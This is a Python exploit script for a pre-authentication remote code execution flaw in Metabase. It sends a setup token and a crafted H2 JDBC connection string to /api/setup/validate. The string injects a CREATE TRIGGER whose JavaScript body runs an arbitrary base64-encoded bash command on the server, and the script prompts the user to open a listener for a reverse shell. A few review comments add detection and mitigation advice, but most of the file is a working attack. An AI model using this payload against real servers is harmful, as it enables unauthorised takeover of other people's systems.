import requests
import argparse
import base64
def b64(command):
    """Return *command* (whitespace-stripped) as base64 text with no ``=`` padding.

    The text is encoded as ASCII; when the result ends in ``=`` characters,
    one trailing space per padding character is appended to the command and
    it is encoded again, so the final byte length is a multiple of 3 and the
    output contains no ``=`` at all.

    Raises:
        UnicodeEncodeError: if *command* contains non-ASCII characters.
    """
    text = command.strip()

    def encode(plain):
        return base64.b64encode(plain.encode('ascii')).decode()

    first = encode(text)
    pad_chars = first.count('=')
    if pad_chars == 0:
        return first
    # One space per '=' brings the length to a multiple of 3 -> no padding.
    return encode(text + ' ' * pad_chars)
# Entry point: parse the target, setup token and command, build the request
# body and POST it once to /api/setup/validate, then print the raw response.
parser = argparse.ArgumentParser('Metabase Pre-Auth RCE')
parser.add_argument('-u', '--url', type=str, required=True, help='Target URL')
# NOTE(review): the setup token is meant to be valid only until first-run
# setup completes; an instance that still returns it from
# /api/session/properties afterwards is the precondition this script relies on.
# Mitigation is to upgrade to a Metabase release that no longer exposes it there
# and to confirm the endpoint returns no token on a configured instance.
parser.add_argument('-t', '--token', type=str, required=True, help='Setup-Token found in /api/session/properties')
parser.add_argument('-c', '--command', type=str, required=True, help='Command to be executed in the target host')
args = parser.parse_args()
# Validation endpoint that opens a JDBC connection using the supplied "details".
url = f"{args.url}/api/setup/validate"
headers = {'Content-Type': 'application/json'}
# b64() (defined above) strips the command and encodes it without '=' padding.
command = b64(args.command)
data = {
"token": args.token,
"details":
{
"is_on_demand": "false",
"is_full_sync": "false",
"is_sample": "false",
"cache_ttl": "null",
"refingerprint": "false",
"auto_run_queries": "true",
"schedules":
{},
"details":
{
# The "db" value is an H2 JDBC path. Everything after the first ';' is read by
# H2 as connection settings; the CREATE TRIGGER statement placed there carries
# a JavaScript body that calls java.lang.Runtime.exec with the encoded command,
# so it is evaluated server-side during connection validation.
# NOTE(review): detection - alert on POST /api/setup/validate against an
# already-configured instance, and on H2 "db" strings containing ';' followed by
# DDL such as CREATE TRIGGER. Running the service as a non-root user with an
# egress allowlist limits what the spawned bash can reach.
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo," + command + "}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": "false",
"ssl": "true"
},
"name": "x",
"engine": "h2"
}
}
# NOTE(review): requests.post() is called without timeout=, so an unresponsive
# host blocks the script indefinitely; the response is printed verbatim.
response = requests.post(url, headers=headers, json=data)
print("Payload sent!\n\nNOTE: Make sure to open a listener on the specifed port and address if you entered a reverse shell command.\n")
print(f"RESPONSE:\n{response.text}")